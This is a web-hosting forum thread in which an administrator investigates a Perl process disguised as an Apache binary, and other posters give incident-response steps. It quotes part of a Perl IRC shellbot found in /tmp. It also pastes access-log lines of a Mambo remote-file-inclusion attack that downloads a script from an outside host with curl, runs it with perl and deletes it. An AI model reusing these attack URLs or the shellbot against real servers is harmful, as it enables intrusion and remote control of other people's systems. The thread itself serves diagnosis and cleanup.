hi

i have found in my top process a running process in perl as nobody

nobody 17859 2.2 0.2 8076 2452 ? S Jan13 91:42 /usr/sbin/apache/logins

what is it?

Run this: /usr/sbin/lsof -p 17859

It's likely a faked process name, faked by a utility called xhide or something similiar. What does ls-al /usr/sbin/apache/logins show, if anything?

Also, I'd run the following:

ps aux|grep ^nobody
ps aux|grep sh
ls -al /tmp|grep -v sess

Note the time the file was run: Jan13 91:42

That's 91 minutes and 42 seconds ago from the time you ran top. You can use that time to start digging through /usr/local/apache/domlogs to see who's running the vulnerable site.

I'd also check /dev/shm (if it's 777), /var/tmp (if it's not symlinked to /tmp), and everything in /tmp.

Furthermore, you may want to look into using suexec and phpsuexec.

Hi

many thanks i have found the files in tmp

-rw-r--r-- 1 nobody nobody 17286 Jan 7 20:59 mamb0files.txt
-rw-r--r-- 1 nobody nobody 17252 Jan 12 20:57 mamb0file.txt

but i dunno how it are running bcs i see .txt extension

i have edit it and i see:


#!/usr/bin/perl
# This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
# so the original author is atrix. the spread perl code was developed by sirhot (i am almost sure) he is from morocco.
# Note to David Jacoby: Damn, google pwnt us with that 403 ****.
#
# The following comments are only left in the code to ridiculize this guy.
# --------------------------------------------------------------
# Morgan has hacked you!
# Morgan: Argentina, Santiago del estero
# Morgan == Cristian David
# Pamela David == Hermana
#
# Old: http://img521.imageshack.us/img521/3779/morganlammer6tu.png
# This Code Was Originally Writen By "somebody", modified by beford, remodified by
# -------------- ASC [AlbaniaSecurityClan]-------------------
# -----------------------------------------------------------


system("kill -9 `ps ax |grep /usr/sbin/apache/logins |grep -v grep|awk '{print $1;}'`");


my $processo = '/usr/sbin/apache/logins';


my @titi = ("EliteCrew");


etc etc

if can help i have found this in domlogs

24.111.8.107 - - [13/Jan/2006:15:23:14 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13944 "-" "Mozilla/5.0"
64.62.160.186 - - [13/Jan/2006:15:23:23 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13952 "-" "Mozilla/5.0"
85.228.22.103 - - [13/Jan/2006:15:25:38 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13944 "-" "Mozilla/5.0"
195.171.106.45 - - [13/Jan/2006:15:25:54 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13938 "-" "Mozilla/5.0"
194.29.158.24 - - [13/Jan/2006:15:26:08 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13938 "-" "Mozilla/5.0"
68.178.147.88 - - [13/Jan/2006:15:30:18 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13944 "-" "Mozilla/5.0"

1. Google for: mamb0files.txt

2. The extension of a filename doesn't matter, you can name a file "linux.exe", and as long as it contains perl content, you can still run: perl linux.exe

If you run "file mamb0files.txt" it will tell you it's a perl file because /usr/share/magic will recognize it as such due to the "#!/usr/bin/perl" line.

3. Find out who has the vulnerable version of Mambo installed. The lsof -p <pid> output will show you this.

4. Run netstat -antp to find out what your machine is connected to (like IRC servers, commonly TCP ports 6660 - 6669). Make sure you kill any processes responsible for those connections. Just be cautious about the processes you kill.

lsof -p <pid> will lead you to the cause of the problem. Look for the /home/username/public_html/whatever/whatever and go from there.

Those logs show 403's, which is "Forbidden"


The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 (Not Found) can be used instead.


Those aren't the right logs, but you're on the right track.


Note the timestamp on this file:

-rw-r--r-- 1 nobody nobody 17286 Jan 7 20:59 mamb0files.txt

This possibly goes back to at least January 7th.

Have a look in /tmp and I expect you'll find mamb0file.txt or something similar.
This is an abuse of a vulnerable Mambo installation - most likely because file perms were set wrong. (chmod 777, for example).

K.